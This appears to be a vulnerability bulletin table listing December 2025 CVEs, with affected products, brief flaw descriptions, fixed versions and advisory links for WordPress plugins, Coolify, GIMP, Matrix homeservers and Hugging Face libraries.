| BeRocket--Brands for WooCommerce | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in BeRocket Brands for WooCommerce brands-for-woocommerce allows Blind SQL Injection. This issue affects Brands for WooCommerce: from n/a through <= 3.8.6.3. | 2025-12-24 | not yet calculated | CVE-2025-68519 | https://vdp.patchstack.com/database/Wordpress/Plugin/brands-for-woocommerce/vulnerability/wordpress-brands-for-woocommerce-plugin-3-8-6-3-sql-injection-vulnerability?_s_id=cve |
| Bit Apps--Bit Assist | Missing Authorization vulnerability in Bit Apps Bit Assist bit-assist allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Bit Assist: from n/a through <= 1.5.11. | 2025-12-24 | not yet calculated | CVE-2025-68596 | https://vdp.patchstack.com/database/Wordpress/Plugin/bit-assist/vulnerability/wordpress-bit-assist-plugin-1-5-11-broken-access-control-vulnerability?_s_id=cve |
| BlueGlass Interactive AG--Jobs for WordPress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BlueGlass Interactive AG Jobs for WordPress job-postings allows Stored XSS. This issue affects Jobs for WordPress: from n/a through <= 2.7.17. | 2025-12-24 | not yet calculated | CVE-2025-68597 | https://vdp.patchstack.com/database/Wordpress/Plugin/job-postings/vulnerability/wordpress-jobs-for-wordpress-plugin-2-7-17-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Bob--Watu Quiz | Missing Authorization vulnerability in Bob Watu Quiz watu allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Watu Quiz: from n/a through <= 3.4.5. | 2025-12-24 | not yet calculated | CVE-2025-68587 | https://vdp.patchstack.com/database/Wordpress/Plugin/watu/vulnerability/wordpress-watu-quiz-plugin-3-4-5-broken-access-control-vulnerability-2?_s_id=cve |
| boldthemes--Bold Timeline Lite | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in bold themes Bold Timeline Lite bold-timeline-lite allows Stored XSS. This issue affects Bold Timeline Lite: from n/a through <= 1.2.7. | 2025-12-24 | not yet calculated | CVE-2025-68513 | https://vdp.patchstack.com/database/Wordpress/Plugin/bold-timeline-lite/vulnerability/wordpress-bold-timeline-lite-plugin-1-2-7-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Brainstorm Force--Astra Widgets | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Brainstorm Force Astra Widgets astra-widgets allows Stored XSS. This issue affects Astra Widgets: from n/a through <= 1.2.16. | 2025-12-24 | not yet calculated | CVE-2025-68497 | https://vdp.patchstack.com/database/Wordpress/Plugin/astra-widgets/vulnerability/wordpress-astra-widgets-plugin-1-2-16-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Brave--Brave | Missing Authorization vulnerability in Brave brave-popup-builder allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Brave: from n/a through <= 0.8.3. | 2025-12-24 | not yet calculated | CVE-2025-68508 | https://vdp.patchstack.com/database/Wordpress/Plugin/brave-popup-builder/vulnerability/wordpress-brave-plugin-0-8-3-broken-access-control-vulnerability?_s_id=cve |
| brownbagmarketing--Greenhouse Job Board | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in brownbagmarketing Greenhouse Job Board greenhouse-job-board allows DOM-Based XSS. This issue affects Greenhouse Job Board: from n/a through <= 2.7.3. | 2025-12-24 | not yet calculated | CVE-2025-67633 | https://vdp.patchstack.com/database/Wordpress/Plugin/greenhouse-job-board/vulnerability/wordpress-greenhouse-job-board-plugin-2-7-3-cross-site-scripting-xss-vulnerability?_s_id=cve |
| captivateaudio--Captivate Sync | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in captivateaudio Captivate Sync captivatesync-trade allows Blind SQL Injection. This issue affects Captivate Sync: from n/a through <= 3.2.2. | 2025-12-24 | not yet calculated | CVE-2025-68570 | https://vdp.patchstack.com/database/Wordpress/Plugin/captivatesync-trade/vulnerability/wordpress-captivate-sync-plugin-3-2-2-sql-injection-vulnerability?_s_id=cve |
| codepeople--WP Time Slots Booking Form | Missing Authorization vulnerability in codepeople WP Time Slots Booking Form wp-time-slots-booking-form allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP Time Slots Booking Form: from n/a through <= 1.2.38. | 2025-12-24 | not yet calculated | CVE-2025-68569 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-time-slots-booking-form/vulnerability/wordpress-wp-time-slots-booking-form-plugin-1-2-38-broken-access-control-vulnerability?_s_id=cve |
| Constantin Boiangiu--Vimeotheque | Cross-Site Request Forgery (CSRF) vulnerability in Constantin Boiangiu Vimeotheque codeflavors-vimeo-video-post-lite allows Cross Site Request Forgery. This issue affects Vimeotheque: from n/a through <= 2.3.5.2. | 2025-12-24 | not yet calculated | CVE-2025-68584 | https://vdp.patchstack.com/database/Wordpress/Plugin/codeflavors-vimeo-video-post-lite/vulnerability/wordpress-vimeotheque-plugin-2-3-5-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| continuwuity--continuwuity | Conduit is a chat server powered by Matrix. A vulnerability that affects a number of Conduit-derived homeservers allows a remote, unauthenticated attacker to force the target server to cryptographically sign arbitrary membership events. Affected products include Conduit prior to version 0.10.10, continuwuity prior to version 0.5.0, Grapevine prior to commit `9a50c244`, and tuwunel prior to version 1.4.8. The flaw exists because the server fails to validate the origin of a signing request, provided the event's state_key is a valid user ID belonging to the target server. Attackers can forge "leave" events for any user on the target server. This forcibly removes users (including admins and bots) from rooms. This allows denial of service and/or the removal of technical protections for a room (including policy servers, if all users on the policy server are removed). Attackers can forge "invite" events from a victim user to themselves, provided they have an account on a server where there is an account that has the power level to send invites. This allows the attacker to join private or invite-only rooms accessible by the victim, exposing confidential conversation history and room state. Attackers can forge "ban" events from a victim user to any user below the victim user's power level, provided the victim has the power level to issue bans AND the target of the ban resides on the same server as the victim. This allows the attacker to ban anyone in a room who is on the same server as the vulnerable one, however cannot exploit this to ban users on other servers or the victim themself. Conduit fixes the issue in version 0.10.10. continuwuity fixes the issue in commits `7fa4fa98` and `b2bead67`, released in 0.5.0. tuwunel fixes the issue in commit `dc9314de1f8a6e040c5aa331fe52efbe62e6a2c3`, released in 1.4.8. Grapevine fixes the issue in commit `9a50c2448abba6e2b7d79c64243bb438b351616c`. As a workaround, block access to the `PUT /_matrix/federation/v2/invite/{roomId}/{eventId}` endpoint using your reverse proxy. | 2025-12-23 | not yet calculated | CVE-2025-68667 | https://github.com/continuwuity/continuwuity/security/advisories/GHSA-22fw-4jq7-g8r8 https://github.com/matrix-construct/tuwunel/commit/dc9314de1f8a6e040c5aa331fe52efbe62e6a2c3 https://forgejo.ellis.link/continuwuation/continuwuity/commit/7fa4fa98628593c1a963f5aa8dbc3657d604b047 https://forgejo.ellis.link/continuwuation/continuwuity/commit/b2bead67ac8bc45de9a612578f295e5b7fc6c2b5 https://gitlab.com/famedly/conduit/-/releases/v0.10.10 https://gitlab.computer.surgery/matrix/grapevine/-/commit/9a50c2448abba6e2b7d79c64243bb438b351616c |
| coollabsio--coolify | Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Prior to version 4.0.0-beta.451, an authenticated command injection vulnerability in the Database Backup functionality allows users with application/service management permissions to execute arbitrary commands as root on managed servers. Database names used in backup operations are passed directly to shell commands without sanitization, enabling full remote code execution. Version 4.0.0-beta.451 fixes the issue. | 2025-12-23 | not yet calculated | CVE-2025-66209 | https://github.com/0xrakan/coolify-cve-2025-66209-66213 https://github.com/coollabsio/coolify/pull/7375 https://github.com/coollabsio/coolify/releases/tag/v4.0.0-beta.451 |
| coollabsio--coolify | Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Prior to version 4.0.0-beta.451, an authenticated command injection vulnerability in the Database Import functionality allows users with application/service management permissions to execute arbitrary commands as root on managed servers. Database names used in import operations are passed directly to shell commands without sanitization, enabling full remote code execution. Version 4.0.0-beta.451 fixes the issue. | 2025-12-23 | not yet calculated | CVE-2025-66210 | https://github.com/0xrakan/coolify-cve-2025-66209-66213 https://github.com/coollabsio/coolify/pull/7375 https://github.com/coollabsio/coolify/releases/tag/v4.0.0-beta.451 |
| coollabsio--coolify | Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Prior to version 4.0.0-beta.451, an authenticated command injection vulnerability in PostgreSQL Init Script Filename handling allows users with application/service management permissions to execute arbitrary commands as root on managed servers. PostgreSQL initialization script filenames are passed to shell commands without proper validation, enabling full remote code execution. Version 4.0.0-beta.451 fixes the issue. | 2025-12-23 | not yet calculated | CVE-2025-66211 | https://github.com/0xrakan/coolify-cve-2025-66209-66213 https://github.com/coollabsio/coolify/pull/7375 https://github.com/coollabsio/coolify/releases/tag/v4.0.0-beta.451 |
| coollabsio--coolify | Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Prior to version 4.0.0-beta.451, an authenticated command injection vulnerability in the Dynamic Proxy Configuration Filename handling allows users with application/service management permissions to execute arbitrary commands as root on managed servers. Proxy configuration filenames are passed to shell commands without proper escaping, enabling full remote code execution. Version 4.0.0-beta.451 fixes the issue. | 2025-12-23 | not yet calculated | CVE-2025-66212 | https://github.com/0xrakan/coolify-cve-2025-66209-66213 https://github.com/coollabsio/coolify/pull/7375 https://github.com/coollabsio/coolify/releases/tag/v4.0.0-beta.451 |
| coollabsio--coolify | Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Prior to version 4.0.0-beta.451, an authenticated command injection vulnerability in the File Storage Directory Mount Path functionality allows users with application/service management permissions to execute arbitrary commands as root on managed servers. The file_storage_directory_source parameter is passed directly to shell commands without proper sanitization, enabling full remote code execution on the host system. Version 4.0.0-beta.451 fixes the issue. | 2025-12-23 | not yet calculated | CVE-2025-66213 | https://github.com/0xrakan/coolify-cve-2025-66209-66213 https://github.com/coollabsio/coolify/pull/7375 https://github.com/coollabsio/coolify/releases/tag/v4.0.0-beta.451 |
| creativeinteractivemedia--Real 3D FlipBook | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in creativeinteractivemedia Real 3D FlipBook real3d-flipbook-lite allows Stored XSS. This issue affects Real 3D FlipBook: from n/a through <= 4.11.4. | 2025-12-24 | not yet calculated | CVE-2025-68512 | https://vdp.patchstack.com/database/Wordpress/Plugin/real3d-flipbook-lite/vulnerability/wordpress-real-3d-flipbook-plugin-4-11-4-cross-site-scripting-xss-vulnerability?_s_id=cve |
| CRM Perks--Integration for Contact Form 7 HubSpot | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in CRM Perks Integration for Contact Form 7 HubSpot cf7-hubspot allows Blind SQL Injection. This issue affects Integration for Contact Form 7 HubSpot: from n/a through <= 1.4.2. | 2025-12-24 | not yet calculated | CVE-2025-68590 | https://vdp.patchstack.com/database/Wordpress/Plugin/cf7-hubspot/vulnerability/wordpress-integration-for-contact-form-7-hubspot-plugin-1-4-2-sql-injection-vulnerability?_s_id=cve |
| Deciso--OPNsense | Deciso OPNsense diag_backup.php filename Directory Traversal Arbitrary File Creation Vulnerability. This vulnerability allows network-adjacent attackers to create arbitrary files on affected installations of Deciso OPNsense. Authentication is required to exploit this vulnerability. The specific flaw exists within the handling of backup configuration files. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to create files in the context of root. Was ZDI-CAN-28133. | 2025-12-23 | not yet calculated | CVE-2025-13698 | ZDI-25-1022 vendor-provided URL |
| Delta Electronics--DVP-12SE | DVP-12SE - Modbus/TCP Cleartext Transmission of Sensitive Information | 2025-12-26 | not yet calculated | CVE-2025-62578 | https://filecenter.deltaww.com/news/download/doc/Delta-PCSA-2025-00021_DVP-12SE%20ModbusTCP%20Cleartext%20Transmission%20of%20Sensitive%20Info.pdf |
| DeluxeThemes--Userpro | Missing Authorization vulnerability in DeluxeThemes Userpro userpro allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Userpro: from n/a through <= 5.1.9. | 2025-12-24 | not yet calculated | CVE-2025-68608 | https://vdp.patchstack.com/database/Wordpress/Plugin/userpro/vulnerability/wordpress-userpro-plugin-5-1-9-broken-access-control-vulnerability?_s_id=cve |
| DreamFactory--DreamFactory | DreamFactory saveZipFile Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of DreamFactory. Authentication is required to exploit this vulnerability. The specific flaw exists within the implementation of the saveZipFile method. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-26589. | 2025-12-23 | not yet calculated | CVE-2025-13700 | ZDI-25-1024 vendor-provided URL |
| Ecommerce Platforms--Gift Hunt | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ecommerce Platforms Gift Hunt gift-hunt allows Stored XSS. This issue affects Gift Hunt: from n/a through <= 2.0.2. | 2025-12-24 | not yet calculated | CVE-2025-67631 | https://vdp.patchstack.com/database/Wordpress/Plugin/gift-hunt/vulnerability/wordpress-gift-hunt-plugin-2-0-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| eigent-ai--eigent | Eigent is a multi-agent Workforce. In version 0.0.60, a 1-click Remote Code Execution (RCE) vulnerability has been identified in Eigent. This vulnerability allows an attacker to execute arbitrary code on the victim's machine or server through a specific interaction (1-click). This issue has been patched in version 0.0.61. | 2025-12-27 | not yet calculated | CVE-2025-68952 | https://github.com/eigent-ai/eigent/security/advisories/GHSA-pwcx-28p4-rmq4 |
| Embeds For YouTube Plugin Support--YouTube Embed | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Embeds For YouTube Plugin Support YouTube Embed youtube-embed allows Stored XSS. This issue affects YouTube Embed: from n/a through <= 5.4. | 2025-12-24 | not yet calculated | CVE-2025-68599 | https://vdp.patchstack.com/database/Wordpress/Plugin/youtube-embed/vulnerability/wordpress-youtube-embed-plugin-5-4-cross-site-scripting-xss-vulnerability?_s_id=cve |
| espressif--esp-idf | ESF-IDF is the Espressif Internet of Things (IOT) Development Framework. In versions 5.5.1, 5.4.3, 5.3.4, 5.2.6, 5.1.6, and earlier, in the ESP-IDF Bluetooth host stack (BlueDroid), the function bta_dm_sdp_result() used a fixed-size array uuid_list[32][MAX_UUID_SIZE] to store discovered service UUIDs during the SDP (Service Discovery Protocol) process. On modern Bluetooth devices, it is possible for the number of available services to exceed this fixed limit (32). In such cases, if more than 32 services are discovered, subsequent writes to uuid_list could exceed the bounds of the array, resulting in a potential out-of-bounds write condition. | 2025-12-26 | not yet calculated | CVE-2025-68473 | https://github.com/espressif/esp-idf/security/advisories/GHSA-hmjj-rjvv-w8pq https://github.com/espressif/esp-idf/commit/3286e45349b0b5c2b1422ef7e8d088b95eef895d https://github.com/espressif/esp-idf/commit/4d928f2265c394d2abc85024228e920a5b26bcab https://github.com/espressif/esp-idf/commit/5b3185168dae83d42aa0852689422fffd931f16c https://github.com/espressif/esp-idf/commit/6453f57a954458ad8ffd6e4bf2d9e76b73fac0f1 https://github.com/espressif/esp-idf/commit/6ca6f422dafaffcb88fa56cc458ce92d96be3b2e https://github.com/espressif/esp-idf/commit/9889edd799cf369e082df9d01adba961d64693ed https://github.com/espressif/esp-idf/commit/ecb86d353640cf1375bf97db32e702ba59c551b6 |
| espressif--esp-idf | ESF-IDF is the Espressif Internet of Things (IOT) Development Framework. In versions 5.5.1, 5.4.3, 5.3.4, 5.2.6, 5.1.6, and earlier, in the avrc_vendor_msg() function of the ESP-IDF BlueDroid AVRCP stack, the allocated buffer size was validated using AVRC_MIN_CMD_LEN (20 bytes). However, the actual fixed header data written before the vendor payload exceeds this value. This totals 29 bytes written before p_msg->p_vendor_data is copied. Using the old AVRC_MIN_CMD_LEN could allow an out-of-bounds write if vendor_len approaches the buffer limit. For commands where vendor_len is large, the original buffer allocation may be insufficient, causing writes beyond the allocated memory. This can lead to memory corruption, crashes, or other undefined behavior. The overflow could be larger when assertions are disabled. | 2025-12-26 | not yet calculated | CVE-2025-68474 | https://github.com/espressif/esp-idf/security/advisories/GHSA-43gh-7r4f-qp57 https://github.com/espressif/esp-idf/commit/0b0b59f2e19cb99dfa1b28c284d1c5c1d276a132 https://github.com/espressif/esp-idf/commit/565fa98d0cfd58102204c1cb636747e17ee59845 https://github.com/espressif/esp-idf/commit/8262ee807d5cd425f66304f703eeb3382fb888c0 https://github.com/espressif/esp-idf/commit/a6c1bc5e3e91ad1cb964ce2c178ee40a5d10a4a0 https://github.com/espressif/esp-idf/commit/aa0e3d75db995b7137b55349fc92ee684b47092d https://github.com/espressif/esp-idf/commit/b9ba1e29b65536ab4b670ac099585d09adce0376 |
| Essekia--Tablesome | Insertion of Sensitive Information Into Sent Data vulnerability in Essekia Tablesome tablesome allows Retrieve Embedded Sensitive Data. This issue affects Tablesome: from n/a through <= 1.1.35.1. | 2025-12-24 | not yet calculated | CVE-2025-68516 | https://vdp.patchstack.com/database/Wordpress/Plugin/tablesome/vulnerability/wordpress-tablesome-plugin-1-1-35-1-sensitive-data-exposure-vulnerability?_s_id=cve |
| Essekia--Tablesome | Missing Authorization vulnerability in Essekia Tablesome tablesome allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Tablesome: from n/a through <= 1.1.35.1. | 2025-12-24 | not yet calculated | CVE-2025-68517 | https://vdp.patchstack.com/database/Wordpress/Plugin/tablesome/vulnerability/wordpress-tablesome-plugin-1-1-35-1-broken-access-control-vulnerability?_s_id=cve |
| FolioVision--FV Simpler SEO | Missing Authorization vulnerability in FolioVision FV Simpler SEO fv-all-in-one-seo-pack allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects FV Simpler SEO: from n/a through <= 1.9.6. | 2025-12-24 | not yet calculated | CVE-2025-68579 | https://vdp.patchstack.com/database/Wordpress/Plugin/fv-all-in-one-seo-pack/vulnerability/wordpress-fv-simpler-seo-plugin-1-9-6-broken-access-control-vulnerability?_s_id=cve |
| Forgejo--Forgejo | Forgejo before 13.0.2 allows attackers to write to unintended files, and possibly obtain server shell access, because of mishandling of out-of-repository symlink destinations for template repositories. This is also fixed for 11 LTS in 11.0.7 and later. | 2025-12-25 | not yet calculated | CVE-2025-68937 | https://codeberg.org/forgejo/forgejo/src/branch/forgejo/release-notes-published/13.0.2.md https://codeberg.org/forgejo/forgejo/src/branch/forgejo/release-notes-published/11.0.7.md https://codeberg.org/forgejo/forgejo/milestone/29156 https://codeberg.org/forgejo/forgejo/milestone/27340 https://codeberg.org/forgejo/security-announcements/issues/43 https://blog.gitea.com/release-of-1.24.7/ |
| FreshRSS--FreshRSS | FreshRSS is a free, self-hostable RSS aggregator. Prior to version 1.28.0, FreshRSS uses cryptographically weak random number generators (mt_rand() and uniqid()) to generate remember-me authentication tokens and challenge-response nonces. This allows attackers to predict valid session tokens, leading to account takeover through persistent session hijacking. The remember-me tokens provide permanent authentication and are the sole credential for "keep me logged in" functionality. This issue has been patched in version 1.28.0. | 2025-12-26 | not yet calculated | CVE-2025-68932 | https://github.com/FreshRSS/FreshRSS/security/advisories/GHSA-j9wc-gwc6-p786 https://github.com/FreshRSS/FreshRSS/pull/8061 https://github.com/FreshRSS/FreshRSS/commit/57e1a375cbd2db9741ff19167813344f8eff5772 |
| Funnelforms--Funnelforms Free | Missing Authorization vulnerability in Funnelforms Funnelforms Free funnelforms-free allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Funnelforms Free: from n/a through <= 3.8. | 2025-12-24 | not yet calculated | CVE-2025-68582 | https://vdp.patchstack.com/database/Wordpress/Plugin/funnelforms-free/vulnerability/wordpress-funnelforms-free-plugin-3-8-broken-access-control-vulnerability?_s_id=cve |
| GIMP--GIMP | GIMP PNM File Parsing Integer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PNM files. The issue results from the lack of proper validation of user-supplied data, which can result in an integer overflow before allocating a buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28273. | 2025-12-23 | not yet calculated | CVE-2025-14422 | ZDI-25-1136 vendor-provided URL |
| GIMP--GIMP | GIMP LBM File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of LBM files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28311. | 2025-12-23 | not yet calculated | CVE-2025-14423 | ZDI-25-1137 vendor-provided URL |
| GIMP--GIMP | GIMP XCF File Parsing Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of XCF files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28376. | 2025-12-23 | not yet calculated | CVE-2025-14424 | ZDI-25-1138 vendor-provided URL |
| GIMP--GIMP | GIMP JP2 File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of JP2 files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28248. | 2025-12-23 | not yet calculated | CVE-2025-14425 | ZDI-25-1139 vendor-provided URL |
| Gora Tech--Cooked | Missing Authorization vulnerability in Gora Tech Cooked cooked allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Cooked: from n/a through <= 1.11.2. | 2025-12-24 | not yet calculated | CVE-2025-68586 | https://vdp.patchstack.com/database/Wordpress/Plugin/cooked/vulnerability/wordpress-cooked-plugin-1-11-2-broken-access-control-vulnerability?_s_id=cve |
| Hanwha Vision Co., Ltd.--Device Manager | Cybersecurity Nozomi Networks Labs, a specialized security company focused on Industrial Control Systems (ICS) and OT/IoT security, has discovered a vulnerability in Device Manager that a hardcoded encryption key for sensitive information. An attacker can use key to decrypt sensitive information. The manufacturer has released patch firmware for the flaw, please refer to the manufacturer's report for details and workarounds. | 2025-12-26 | not yet calculated | CVE-2025-52601 | https://www.hanwhavision.com/wp-content/uploads/2025/12/Camera-Vulnerability-ReportCVE-2025-5259852601-8075.pdf |
| Hanwha Vision Co., Ltd.--QNV-C8012 | Cybersecurity Nozomi Networks Labs, a specialized security company focused on Industrial Control Systems (ICS) and OT/IoT security, has found a flaw that camera's client service does not perform certificate validation. The manufacturer has released patch firmware for the flaw, please refer to the manufacturer's report for details and workarounds. | 2025-12-26 | not yet calculated | CVE-2025-52598 | https://www.hanwhavision.com/wp-content/uploads/2025/12/Camera-Vulnerability-ReportCVE-2025-5259852601-8075.pdf |
| Hanwha Vision Co., Ltd.--QNV-C8012 | Cybersecurity Nozomi Networks Labs, a specialized security company focused on Industrial Control Systems (ICS) and OT/IoT security, has discovered Inadequate of permission management for camera guest account. The manufacturer has released patch firmware for the flaw, please refer to the manufacturer's report for details and workarounds. | 2025-12-26 | not yet calculated | CVE-2025-52599 | https://www.hanwhavision.com/wp-content/uploads/2025/12/Camera-Vulnerability-ReportCVE-2025-5259852601-8075.pdf |
| Hanwha Vision Co., Ltd.--QNV-C8012 | Cybersecurity Nozomi Networks Labs, a specialized security company focused on Industrial Control Systems (ICS) and OT/IoT security, has discovered a vulnerability in camera video analytics that Improper input validation. This vulnerability could allow an attacker to execute specific commands on the user's host PC.The manufacturer has released patch firmware for the flaw, please refer to the manufacturer's report for details and workarounds. | 2025-12-26 | not yet calculated | CVE-2025-52600 | https://www.hanwhavision.com/wp-content/uploads/2025/12/Camera-Vulnerability-ReportCVE-2025-5259852601-8075.pdf |
| Hanwha Vision Co., Ltd.--QNV-C8012 | Cybersecurity Nozomi Networks Labs, a specialized security company focused on Industrial Control Systems (ICS) and OT/IoT security, has discovered that validation of incoming XML format request messages is inadequate. This vulnerability could allow an attacker to XSS on the user's browser. The manufacturer has released patch firmware for the flaw, please refer to the manufacturer's report for details and workarounds. | 2025-12-26 | not yet calculated | CVE-2025-8075 | https://www.hanwhavision.com/wp-content/uploads/2025/12/Camera-Vulnerability-ReportCVE-2025-5259852601-8075.pdf |
| HasThemes--WC Builder | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in HasThemes WC Builder wc-builder allows Stored XSS. This issue affects WC Builder: from n/a through <= 1.2.0. | 2025-12-24 | not yet calculated | CVE-2025-68533 | https://vdp.patchstack.com/database/Wordpress/Plugin/wc-builder/vulnerability/wordpress-wc-builder-plugin-1-2-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Hugging Face--Accelerate | Hugging Face Accelerate Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face Accelerate. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of checkpoints. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27985. | 2025-12-23 | not yet calculated | CVE-2025-14925 | ZDI-25-1140 |
| Hugging Face--Diffusers | Hugging Face Diffusers CogView4 Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face Diffusers. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of checkpoints. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27424. | 2025-12-23 | not yet calculated | CVE-2025-14922 | ZDI-25-1142 |
| Hugging Face--smolagents | Hugging Face smolagents Remote Python Executor Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face smolagents. Authentication is not required to exploit this vulnerability. The specific flaw exists within the parsing of pickle data. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-28312. | 2025-12-23 | not yet calculated | CVE-2025-14931 | ZDI-25-1143 |
| Hugging Face--Transformers | Hugging Face Transformers Perceiver Model Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face Transformers. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of model files. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-25423. | 2025-12-23 | not yet calculated | CVE-2025-14920 | ZDI-25-1150 |
| Hugging Face--Transformers | Hugging Face Transformers Transformer-XL Model Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face Transformers. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of model files. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-25424. | 2025-12-23 | not yet calculated | CVE-2025-14921 | ZDI-25-1149 |
| Hugging Face--Transformers | Hugging Face Transformers megatron_gpt2 Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face Transformers. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of checkpoints. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27984. | 2025-12-23 | not yet calculated | CVE-2025-14924 | ZDI-25-1141 |
| Hugging Face--Transformers | Hugging Face Transformers SEW convert_config Code Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face Transformers. User interaction is required to exploit this vulnerability in that the target must convert a malicious checkpoint. The specific flaw exists within the convert_config function. The issue results from the lack of proper validation of a user-supplied string before using it to execute Python code. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-28251. | 2025-12-23 | not yet calculated | CVE-2025-14926 | ZDI-25-1147 |
| Hugging Face--Transformers | Hugging Face Transformers SEW-D convert_config Code Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face Transformers. User interaction is required to exploit this vulnerability in that the target must convert a malicious checkpoint. The specific flaw exists within the convert_config function. The issue results from the lack of proper validation of a user-supplied string before using it to execute Python code. An attacker can leverage this vulnerability to execute code in the context of the current user. . Was ZDI-CAN-28252. | 2025-12-23 | not yet calculated | CVE-2025-14927 | ZDI-25-1148 |
| Hugging Face--Transformers | Hugging Face Transformers HuBERT convert_config Code Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hugging Face Transformers. User interaction is required to exploit this vulnerability in that the target must convert a malicious checkpoint. The specific flaw exists within the convert_config function. The issue results from the lack of proper validation of a user-supplied string before using it to execute Python code. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-28253. | 2025-12-23 | not yet calculated | CVE-2025-14928 | ZDI-25-1146 |
